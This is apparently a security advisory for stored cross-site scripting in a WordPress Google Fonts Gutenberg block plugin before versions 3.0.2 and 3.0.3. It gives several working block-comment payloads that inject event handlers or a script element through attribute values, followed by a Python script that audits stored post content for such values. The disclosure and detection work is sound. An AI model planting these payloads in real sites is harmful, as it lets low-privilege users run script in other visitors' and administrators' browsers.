The plugin does not escape and sanitise some of its block settings, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks via the blockType (combined with content), align, color, variant and fontID arguments of a Gutenberg block.
As a contributor, put the following code in a post/page while in Code Editor mode:

< 3.0.2

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(1+origin)//"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","align":"center;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(2+origin)//","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//","variant":"400","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial","variant":"400;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(/Variant/)//","content":"Hello, World!"} /-->

< 3.0.3

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"alert(\u0022xss\u0022)"} /-->
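To find already-stored instances of this block with unsafe attribute values, post content (for example an export of `wp_posts.post_content`) can be audited against an allowlist. The following is an added example, not code from the plugin or from this advisory; the function name `audit_post_content` and the allowlist patterns are assumptions about what benign values look like, and the sample input is one constructed benign block plus two of the blocks shown above.

```python
import json
import re

# Captures the JSON attribute object of this plugin's block comment.
BLOCK_RE = re.compile(
    r"<!--\s*wp:olympus-google-fonts/google-fonts\s+(\{.*?\})\s*/?-->", re.S)

# Assumed allowlists (not taken from the plugin): the shape of a benign value
# for each attribute the advisory names as an injection point.
SAFE = {
    "blockType": re.compile(r"h[1-6]|p|span|blockquote"),
    "align": re.compile(r"left|center|right"),
    "color": re.compile(r"#[0-9a-fA-F]{3,8}|[a-zA-Z]{1,30}"),
    "variant": re.compile(r"[1-9]00(i|italic)?|regular|italic"),
    "fontID": re.compile(r"[A-Za-z0-9_+ -]{1,64}"),
}


def audit_post_content(post_content):
    """Return (attribute, value) pairs that fail the allowlist, in document order."""
    findings = []
    for match in BLOCK_RE.finditer(post_content):
        try:
            # json.loads decodes \u0022 to a double quote, so the check sees
            # the same value that would reach the rendered markup.
            attrs = json.loads(match.group(1))
        except json.JSONDecodeError:
            findings.append(("<json>", match.group(1)))
            continue
        for name, pattern in SAFE.items():
            if name in attrs and not pattern.fullmatch(str(attrs[name])):
                findings.append((name, str(attrs[name])))
    return findings


# Sample input: the first block is constructed and benign; the other two are
# the color and blockType cases from this advisory.
SAMPLE = r'''
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red"} /-->
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(1+origin)//"} /-->
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"alert(\u0022xss\u0022)"} /-->
'''

if __name__ == "__main__":
    for name, value in audit_post_content(SAMPLE):
        print(f"unsafe {name}: {value!r}")
```

A finding means the stored value falls outside the assumed allowlist and the post should be reviewed; it does not replace updating the plugin.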
apple502j
apple502j
Yes
2021-08-23
2021-08-23
2022-03-07